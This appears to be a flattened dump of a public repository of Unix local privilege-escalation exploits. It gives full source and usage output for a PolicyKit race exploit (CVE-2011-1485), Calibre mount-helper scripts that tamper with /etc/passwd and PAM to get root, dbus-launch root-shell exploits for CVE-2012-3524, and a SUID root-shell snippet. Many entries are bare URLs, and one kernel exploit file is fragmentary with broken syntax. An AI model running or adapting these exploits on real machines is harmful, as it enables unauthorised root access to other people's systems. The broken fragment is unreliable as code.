43 | gcc -o makesuid makesuid.c 44 | ./makesuid chown root:root $PWD/suid 45 | ./makesuid chmod u+s $PWD/suid 46 | echo "your suid is on ./suid make sure u move this !!!" 47 | rm suid.c makesuid.c makesuid 48 | $PWD/suid -c /usr/bin/id -------------------------------------------------------------------------------- /2011/CVE-2011-1485/polkit-pwnage.c: -------------------------------------------------------------------------------- 1 | /* polkit-pwnage.c 2 | * 3 | * 4 | * ============================== 5 | * = PolicyKit Pwnage = 6 | * = by zx2c4 = 7 | * = Sept 2, 2011 = 8 | * ============================== 9 | * 10 | * 11 | * Howdy folks, 12 | * 13 | * This exploits CVE-2011-1485, a race condition in PolicyKit. 14 | * 15 | * davidz25 explains: 16 | * 17 | * --begin-- 18 | * Briefly, the problem is that the UID for the parent process of pkexec(1) is 19 | * read from /proc by stat(2)'ing /proc/PID. The problem with this is that 20 | * this returns the effective uid of the process which can easily be set to 0 21 | * by invoking a setuid-root binary such as /usr/bin/chsh in the parent 22 | * process of pkexec(1). Instead we are really interested in the real-user-id. 23 | * While there's a check in pkexec.c to avoid this problem (by comparing it to 24 | * what we expect the uid to be - namely that of the pkexec.c process itself which 25 | * is the uid of the parent process at pkexec-spawn-time), there is still a short 26 | * window where an attacker can fool pkexec/polkitd into thinking that the parent 27 | * process has uid 0 and is therefore authorized. It's pretty hard to hit this 28 | * window - I actually don't know if it can be made to work in practice. 29 | * --end-- 30 | * 31 | * Well, here is, in fact, how it's made to work in practice. There is as he said an 32 | * attempted mitigation, and the way to trigger that mitigation path is something 33 | * like this: 34 | * 35 | * $ sudo -u `whoami` pkexec sh 36 | * User of caller (0) does not match our uid (1000) 37 | * 38 | * Not what we want. So the trick is to execl to a suid at just the precise moment 39 | * /proc/PID is being stat(2)'d. We use inotify to learn exactly when it's accessed, 40 | * and execl to the suid binary as our very next instruction. 41 | * 42 | * ** Usage ** 43 | * $ pkexec --version 44 | * pkexec version 0.101 45 | * $ gcc polkit-pwnage.c -o pwnit 46 | * $ ./pwnit 47 | * [+] Configuring inotify for proper pid. 48 | * [+] Launching pkexec. 49 | * sh-4.2# whoami 50 | * root 51 | * sh-4.2# id 52 | * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm) 53 | * sh-4.2# 54 | * 55 | * ** Targets ** 56 | * This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which 57 | * as of writing uses 0.101, has backported 0.102's bug fix. A way to check 58 | * this is by looking at the mtime of /usr/bin/pkexec -- April 19, 2011 or 59 | * later and you're out of luck. It's likely other distributions do the same. 60 | * Fortunately, this exploit is clean enough that you can try it out without 61 | * too much collateral. 62 | * 63 | * 64 | * greets to djrbliss and davidz25. 65 | * 66 | * - zx2c4 67 | * 2-sept-2011 68 | * 69 | */ 70 | 71 | 72 | #include 73 | #include 74 | #include 75 | #include 76 | #include 77 | #include 78 | 79 | int main(int argc, char **argv) 80 | { 81 | printf("=============================\n"); 82 | printf("= PolicyKit Pwnage =\n"); 83 | printf("= by zx2c4 =\n"); 84 | printf("= Sept 2, 2011 =\n"); 85 | printf("=============================\n\n"); 86 | 87 | if (fork()) { 88 | int fd; 89 | char pid_path[1024]; 90 | sprintf(pid_path, "/proc/%i", getpid()); 91 | printf("[+] Configuring inotify for proper pid.\n"); 92 | close(0); close(1); close(2); 93 | fd = inotify_init(); 94 | if (fd < 0) 95 | perror("[-] inotify_init"); 96 | inotify_add_watch(fd, pid_path, IN_ACCESS); 97 | read(fd, NULL, 0); 98 | execl("/usr/bin/chsh", "chsh", NULL); 99 | } else { 100 | sleep(1); 101 | printf("[+] Launching pkexec.\n"); 102 | execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL); 103 | } 104 | return 0; 105 | } 106 | -------------------------------------------------------------------------------- /2011/CVE-2011-4124/cali.sh: -------------------------------------------------------------------------------- 1 | # Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root 2 | # Date: Nov 2, 2011 3 | # Author: zx2c4 4 | # Software Link: http://calibre-ebook.com/ 5 | # Tested on: Gentoo 6 | # Platform: Linux 7 | # Category: Local 8 | # CVE: pending 9 | #!/bin/sh 10 | 11 | ####################################### 12 | # .60-Calibrer Assault Mount # 13 | # by zx2c4 # 14 | ####################################### 15 | 16 | ################################################################################ 17 | # Yesterday we learned how Calibre's usage of execlp allowed us to override PATH 18 | # and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a 19 | # more fundumental issue with Calibre's mount helper -- namely, that it allows 20 | # us to mount a vfat filesystem anywhere we want. By mounting a file system 21 | # image over /etc, we are able to tinker /etc/passwd and make the root password 22 | # temporarily "toor". 23 | # 24 | # - zx2c4 25 | # 2011-11-2 26 | # 27 | # Usage: 28 | # $ ./60calibrerassaultmount.sh 29 | # [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4 30 | # [+] Making overlay image: 31 | # 51200+0 records in 32 | # 51200+0 records out 33 | # 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s 34 | # mkfs.vfat 3.0.11 (24 Dec 2010) 35 | # [+] Mounting overlay image using calibre-mount-helper. 36 | # [+] Copying /etc into overlay. 37 | # [+] Tampering with overlay's passwd. 38 | # [+] Unmounting overlay image using calibre-mount-helper. 39 | # [+] Mounting overlay to /etc using calibre-mount-helper. 40 | # [+] Asking for root. When prompted for a password, enter 'toor'. 41 | # Password: [typed in toor to the terminal] 42 | # [+] Unmounting /etc using root umount. 43 | # [+] Cleaning up: /tmp/tmp.OGgS0jaoD4 44 | # [+] Getting shell. 45 | # sh-4.2# id 46 | # uid=0(root) gid=0(root) groups=0(root) 47 | # sh-4.2# whoami 48 | # root 49 | # sh-4.2# 50 | ################################################################################ 51 | 52 | 53 | echo "#######################################" 54 | echo "# .60-Calibrer Assault Mount #" 55 | echo "# by zx2c4 #" 56 | echo "#######################################" 57 | echo 58 | echo -n "[+] Making temporary directory: " 59 | dir="$(mktemp -d)" 60 | echo "$dir" 61 | cd "$dir" 62 | echo "[+] Making overlay image:" 63 | dd if=/dev/zero of=overlay count=51200 64 | /usr/sbin/mkfs.vfat overlay 65 | echo "[+] Mounting overlay image using calibre-mount-helper." 66 | mkdir staging 67 | calibre-mount-helper mount overlay staging 68 | echo "[+] Copying /etc into overlay." 69 | cd staging/ 70 | cp -a /etc/* . 2>/dev/null 71 | echo "[+] Tampering with overlay's passwd." 72 | cat passwd | tail -n +2 > tmp 73 | echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp 74 | mv tmp passwd 75 | echo "[+] Unmounting overlay image using calibre-mount-helper." 76 | cd .. 77 | calibre-mount-helper eject overlay staging >/dev/null 2>&1 78 | echo "[+] Mounting overlay to /etc using calibre-mount-helper." 79 | calibre-mount-helper mount overlay /etc >/dev/null 2>&1 80 | cd / 81 | echo "[+] Asking for root. When prompted for a password, enter 'toor'." 82 | su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; 83 | HISTFILE=\"/dev/null\" exec /bin/sh" 84 | -------------------------------------------------------------------------------- /2011/CVE-2011-4124/calib.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ########################################### 4 | # .70-Calibrer Assault Mount # 5 | # by Dan Rosenberg (@djrbliss) and zx2c4 # 6 | ########################################### 7 | 8 | ################################################################################ 9 | # Yesterday we learned how Calibre's ability to mount anything anywhere resulted 10 | # in a local root. Today's exploit shows a race condition to subvert recent 11 | # changes preventing symlinks and checking path prefixes. 12 | # 13 | # - djrbliss & zx2c4 14 | # 2011-11-3 15 | ################################################################################ 16 | 17 | 18 | overlay=/dev/shm/overlay 19 | staging=/media/staging 20 | mounter=calibre-mount-helper 21 | fakemount=/media/staging/fake 22 | target=/etc/pam.d 23 | mkfsntfs=/sbin/mkfs.ntfs 24 | 25 | echo "[+] Making overlay image:" 26 | dd if=/dev/zero of=$overlay count=51200 27 | $mkfsntfs -F $overlay 28 | 29 | echo "[+] Mounting overlay image using calibre-mount-helper." 30 | $mounter mount $overlay $staging 31 | 32 | echo "[+] Copying /etc/pam.d/ into overlay." 33 | cp /etc/pam.d/* $staging/ 2>/dev/null 34 | 35 | sed -i "s/pam_deny.so/pam_permit.so/g" $staging/common-auth 36 | 37 | echo "[*] Making fake mountpoint." 38 | rm -rf $fakemount 2>/dev/null 39 | 40 | echo "[*] Preparing binary payload..." 41 | 42 | cat > /tmp/pwn.c << _EOF 43 | #include 44 | #include 45 | #include 46 | 47 | int main(int argc, char **argv) 48 | { 49 | 50 | int fd, wd, ret; 51 | 52 | if (fork()) { 53 | fd = inotify_init(); 54 | 55 | unlink("$fakemount"); 56 | mkdir("$fakemount"); 57 | 58 | wd = inotify_add_watch(fd, "$fakemount", IN_CREATE); 59 | read(fd, 0, 0); 60 | 61 | rename("$fakemount", "$staging/tmp"); 62 | symlink("$target", "$fakemount"); 63 | rmdir("$staging/tmp"); 64 | 65 | return 0; 66 | 67 | } else { 68 | sleep(1); 69 | return system("$mounter mount $overlay $fakemount"); 70 | } 71 | return 0; 72 | } 73 | _EOF 74 | 75 | gcc /tmp/pwn.c -o /tmp/pwn 76 | ret=1 77 | while [ $ret -ne 0 ]; do 78 | /tmp/pwn 79 | ret=$? 80 | done; 81 | 82 | sleep 2 83 | 84 | echo "[+] Asking for root. When prompted for a password, type anything and press enter." 85 | su -c "echo \"[+] Cleaning up.\"; umount $fakemount; umount $staging; rm -rf $overlay; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh" 86 | -------------------------------------------------------------------------------- /2011/CVE-2011-4124/shadow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/CVE-2011-4124/shadow -------------------------------------------------------------------------------- /2011/CVE-2012-0809/death-star: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/CVE-2012-0809/death-star -------------------------------------------------------------------------------- /2011/z1d-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/z1d-2011 -------------------------------------------------------------------------------- /2012/0977: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/0977 -------------------------------------------------------------------------------- /2012/10: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/10 -------------------------------------------------------------------------------- /2012/11: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/11 -------------------------------------------------------------------------------- /2012/13x: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/13x -------------------------------------------------------------------------------- /2012/14: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/14 -------------------------------------------------------------------------------- /2012/15150: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/15150 -------------------------------------------------------------------------------- /2012/15200: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/15200 -------------------------------------------------------------------------------- /2012/16-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/16-1 -------------------------------------------------------------------------------- /2012/18: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/18 -------------------------------------------------------------------------------- /2012/18-5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/18-5 -------------------------------------------------------------------------------- /2012/2-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2-1 -------------------------------------------------------------------------------- /2012/2-6-37: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2-6-37 -------------------------------------------------------------------------------- /2012/2.6.17_2.6.24: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.17_2.6.24 -------------------------------------------------------------------------------- /2012/2.6.18-2.6.24-2.6.20-2.6.22-2.6.21.c: -------------------------------------------------------------------------------- 1 | */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | static int own_child(int *us) 11 | 12 | int pid; 13 | int s[2]; 14 | struct msghdr mh; 15 | char crap[1024]; 16 | struct iovec iov; 17 | struct cmsghdr *c; 18 | int *fd; 19 | int rc; 20 | 21 | pid = fork(); 22 | if (pid == -1) 23 | err(1, "fork()"); 24 | 25 | if (pid) { 26 | close(us[1]); 27 | 28 | return pid; 29 | } 30 | 31 | close(us[0]); 32 | 33 | memset(&mh, 0, sizeof(mh)); 34 | iov.iov_base = "a"; 35 | iov.iov_len = 1; 36 | 37 | mh.msg_iov = &iov; 38 | mh.msg_iovlen = 1; 39 | mh.msg_control = crap; 40 | mh.msg_controllen = sizeof(crap); 41 | 42 | c = CMSG_FIRSTHDR(&mh); 43 | assert(c); 44 | 45 | c->cmsg_level = SOL_SOCKET; 46 | c->cmsg_type = SCM_RIGHTS; 47 | 48 | fd = (int*) CMSG_DATA(c); 49 | assert(fd); 50 | 51 | c->cmsg_len = CMSG_LEN(sizeof(int)); 52 | mh.msg_controllen = c->cmsg_len; 53 | 54 | while (1) { 55 | if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == -1) 56 | err(1, "socketpair()"); 57 | 58 | *fd = s[0]; 59 | 60 | rc = sendmsg(us[1], &mh, 0); 61 | if (rc == -1) 62 | err(1, "sendmsg()"); 63 | 64 | if (rc != iov.iov_len) 65 | errx(1, "sent short"); 66 | 67 | close(s[0]); 68 | close(us[1]); 69 | us[1] = s[1]; 70 | } 71 | 72 | 73 | static void own(void) 74 | { 75 | static int pid; 76 | static int us[2]; 77 | char crap[1024]; 78 | char morte[1024]; 79 | struct cmsghdr *c; 80 | int rc; 81 | struct msghdr mh; 82 | struct iovec iov; 83 | int *fds; 84 | 85 | if (!pid) { 86 | if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == -1) 87 | err(1, "socketpair()"); 88 | pid = own_child(us); 89 | } 90 | 91 | iov.iov_base = morte; 92 | iov.iov_len = sizeof(morte); 93 | 94 | memset(&mh, 0, sizeof(mh)); 95 | mh.msg_iov = &iov; 96 | mh.msg_iovlen = 1; 97 | mh.msg_control = crap; 98 | mh.msg_controllen = sizeof(crap); 99 | 100 | rc = recvmsg(us[0], &mh, 0); 101 | if (rc == -1) 102 | err(1, "recvmsg()"); 103 | 104 | if (rc == 0) 105 | errx(1, "EOF"); 106 | 107 | c = CMSG_FIRSTHDR(&mh); 108 | assert(c); 109 | assert(c->cmsg_type == SCM_RIGHTS); 110 | 111 | fds = (int*) CMSG_DATA(c); 112 | assert(fds); 113 | 114 | close(us[0]); 115 | us[0] = *fds; 116 | 117 | 118 | int main(int argc, char *argv[]) 119 | 120 | own(); 121 | exit(0); -------------------------------------------------------------------------------- /2012/2.6.18-374.12.1.el5-2012: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.18-374.12.1.el5-2012 -------------------------------------------------------------------------------- /2012/2.6.32.279..2012.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.32.279..2012.out -------------------------------------------------------------------------------- /2012/2.6.33: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.33 -------------------------------------------------------------------------------- /2012/2.6.37: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.37 -------------------------------------------------------------------------------- /2012/2.6.37-rc2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.37-rc2 -------------------------------------------------------------------------------- /2012/2.6.39 and up/mempodipper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.39 and up/mempodipper -------------------------------------------------------------------------------- /2012/3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/3 -------------------------------------------------------------------------------- /2012/31: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/31 -------------------------------------------------------------------------------- /2012/36-rc1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/36-rc1 -------------------------------------------------------------------------------- /2012/4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/4 -------------------------------------------------------------------------------- /2012/44: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/44 -------------------------------------------------------------------------------- /2012/5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/5 -------------------------------------------------------------------------------- /2012/7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/7 -------------------------------------------------------------------------------- /2012/7-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/7-2 -------------------------------------------------------------------------------- /2012/7x: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/7x -------------------------------------------------------------------------------- /2012/8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/8 -------------------------------------------------------------------------------- /2012/89: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/89 -------------------------------------------------------------------------------- /2012/9: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/9 -------------------------------------------------------------------------------- /2012/99: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/99 -------------------------------------------------------------------------------- /2012/CVE-2012-0946/CVE-2012-0946: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/CVE-2012-0946/CVE-2012-0946 -------------------------------------------------------------------------------- /2012/CVE-2012-3524/dd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/CVE-2012-3524/dd -------------------------------------------------------------------------------- /2012/CVE-2012-3524/dd.c: -------------------------------------------------------------------------------- 1 | /* CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer 2 | * 3 | * edited by Pashkela for RDOT.ORG (23.01.2013) 4 | * 5 | * su auto vector (need tty + current user password) 6 | * 7 | * Trivial non-dbus root exploit. (Yes, it is 2012!) 8 | * 9 | * The underlying bug (insecure getenv() by default) has been 10 | * reported ages ago, but nobody really cared. Unless you have an 11 | * exploit... 12 | * ============================================================== 13 | * Ubuntu 9.04 14 | * 15 | * an@an-desktop:~$ uname -a 16 | * Linux an-desktop 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux 17 | * an@an-desktop:~$ gcc s.c -o s 18 | * an@an-desktop:~$ id 19 | * uid=1000(an) gid=1000(an) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(an) 20 | * an@an-desktop:~$ ./s 21 | * [**] CVE-2012-3524 xSports -- this is not a dbus exploit! 22 | * 23 | *[*] Preparing ... 24 | *[+] Type current user passwd when asked 25 | *[*] Waiting 10s for dbus-launch to drop boomshell. 26 | * Password: ....... 27 | * bash: [+] GOT root!: No such file or directory 28 | * ... 29 | * [!] Hurra! 30 | * bash-3.2# id 31 | * uid=0(root) gid=1000(an) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(an) 32 | * bash-3.2# 33 | * ============================================================== 34 | */ 35 | 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | 46 | 47 | int main(int argc, char **argv) 48 | { 49 | int i = 0; 50 | struct stat st; 51 | pid_t pid = 0; 52 | char *env[] = { 53 | "PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin", 54 | "DBUS_STARTER_BUS_TYPE=system", 55 | "DBUS_SYSTEM_BUS_ADDRESS=autolaunch:", 56 | NULL, 57 | NULL 58 | }; 59 | 60 | 61 | char *su[] = {"/bin/su",NULL,"[+] GOT root!", NULL}; 62 | 63 | char **a = su; 64 | char *dbus[] = {"/tmp/dbus-launch", NULL}; 65 | char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL}; 66 | char me[0x1000]; 67 | 68 | if (geteuid() == 0 && argc > 1) { 69 | chown("/tmp/dbus-launch", 0, 0); 70 | chmod("/tmp/dbus-launch", 04755); 71 | exit(errno); 72 | } else if (geteuid() == 0) { 73 | setuid(0); 74 | execve(*sh, sh, NULL); 75 | return errno; 76 | } 77 | 78 | printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n"); 79 | memset(me, 0, sizeof(me)); 80 | 81 | if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) { 82 | /* Solaris */ 83 | readlink("/proc/self/path/a.out", me, sizeof(me) - 1); 84 | } 85 | symlink(me, "/tmp/dbus-launch"); 86 | printf("[+] Type current user passwd when asked\n"); 87 | env[3] = "DISPLAY=:7350"; 88 | su[1] = getenv("USER"); 89 | a = su; 90 | 91 | if ((pid = fork()) == 0) { 92 | execve(*a, a, env); 93 | exit(0); 94 | } 95 | 96 | printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n"); 97 | 98 | for (i = 0; i < 10; ++i) { 99 | sleep(1); 100 | printf("."); fflush(stdout); 101 | } 102 | kill(pid, SIGKILL); 103 | waitpid(pid, NULL, 0); 104 | 105 | for (;;) { 106 | stat(*dbus, &st); 107 | if ((st.st_mode & 04755) == 04755) 108 | break; 109 | sleep(1); 110 | } 111 | printf("\n[!] Hurra!\n"); 112 | 113 | execve(*dbus, dbus, NULL); 114 | return errno; 115 | } -------------------------------------------------------------------------------- /2012/CVE-2012-3524/dzug: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/CVE-2012-3524/dzug -------------------------------------------------------------------------------- /2012/CVE-2012-3524/dzug.c: -------------------------------------------------------------------------------- 1 | /* dzug.c CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer 2 | * 3 | * Trivial non-dbus root exploit. (Yes, it is 2012!) 4 | * 5 | * The underlying bug (insecure getenv() by default) has been 6 | * reported ages ago, but nobody really cared. Unless you have an 7 | * exploit... 8 | * 9 | */ 10 | 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | 22 | int main(int argc, char **argv) 23 | { 24 | int i = 0; 25 | struct stat st; 26 | pid_t pid = 0; 27 | char *env[] = { 28 | "PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin", 29 | "DBUS_STARTER_BUS_TYPE=system", 30 | "DBUS_SYSTEM_BUS_ADDRESS=autolaunch:", 31 | NULL, 32 | NULL 33 | }; 34 | 35 | 36 | /* the pam_systemd vector */ 37 | char *su[] = {"/bin/su", NULL, "blah", NULL}; 38 | 39 | /* the spice vector */ 40 | char *spice[] = {"/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper", NULL}; 41 | 42 | /* the Xorg vector, for older Linux dists and Solaris */ 43 | char *xorg[] = {"/usr/bin/Xorg", ":7350", NULL}; 44 | 45 | char **a = xorg; 46 | char *dbus[] = {"/tmp/dbus-launch", NULL}; 47 | char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL}; 48 | char me[0x1000]; 49 | 50 | if (geteuid() == 0 && argc > 1) { 51 | chown("/tmp/dbus-launch", 0, 0); 52 | chmod("/tmp/dbus-launch", 04755); 53 | exit(errno); 54 | } else if (geteuid() == 0) { 55 | setuid(0); 56 | execve(*sh, sh, NULL); 57 | return errno; 58 | } 59 | 60 | printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n"); 61 | memset(me, 0, sizeof(me)); 62 | 63 | if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) { 64 | /* Solaris */ 65 | readlink("/proc/self/path/a.out", me, sizeof(me) - 1); 66 | } 67 | symlink(me, "/tmp/dbus-launch"); 68 | 69 | if (stat(spice[0], &st) == 0) { 70 | if ((st.st_mode & 04000) == 04000) { 71 | printf("[+] Using spice helper ...\n"); 72 | a = spice; 73 | } 74 | } else if (stat("/lib64/security/pam_systemd.so", &st) == 0) { 75 | printf("[+] Using pam_systemd helper (type user passwd when asked) ...\n"); 76 | env[3] = "DISPLAY=:7350"; 77 | su[1] = getenv("USER"); 78 | a = su; 79 | } else if (stat(xorg[0], &st) == 0) { 80 | if ((st.st_mode & 04000) == 04000) 81 | printf("[+] Using Xorg helper ...\n"); 82 | else { 83 | printf("[-] No suitable suid helper found.\n"); 84 | exit(0); 85 | } 86 | } else { 87 | printf("[-] No suitable suid helper found.\n"); 88 | exit(0); 89 | } 90 | 91 | if ((pid = fork()) == 0) { 92 | execve(*a, a, env); 93 | exit(0); 94 | } 95 | 96 | printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n"); 97 | 98 | for (i = 0; i < 10; ++i) { 99 | sleep(1); 100 | printf("."); fflush(stdout); 101 | } 102 | kill(pid, SIGKILL); 103 | waitpid(pid, NULL, 0); 104 | 105 | for (;;) { 106 | stat(*dbus, &st); 107 | if ((st.st_mode & 04755) == 04755) 108 | break; 109 | sleep(1); 110 | } 111 | printf("\n[!] Hurra!\n"); 112 | 113 | execve(*dbus, dbus, NULL); 114 | return errno; 115 | } 116 | 117 | -------------------------------------------------------------------------------- /2012/a.out: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Exploit Title: Ubuntu PAM MOTD local root 4 | # Date: July 9, 2010 5 | # Author: Anonymous 6 | # Software Link: http://packages.ubuntu.com/ 7 | # Version: pam-1.1.0 8 | # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx) 9 | # CVE: CVE-2010-0832 10 | # Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i 11 | # References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen 12 | # 13 | # Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow. 14 | # Does not prompt for login by creating temporary SSH key and authorized_keys entry. 15 | # 16 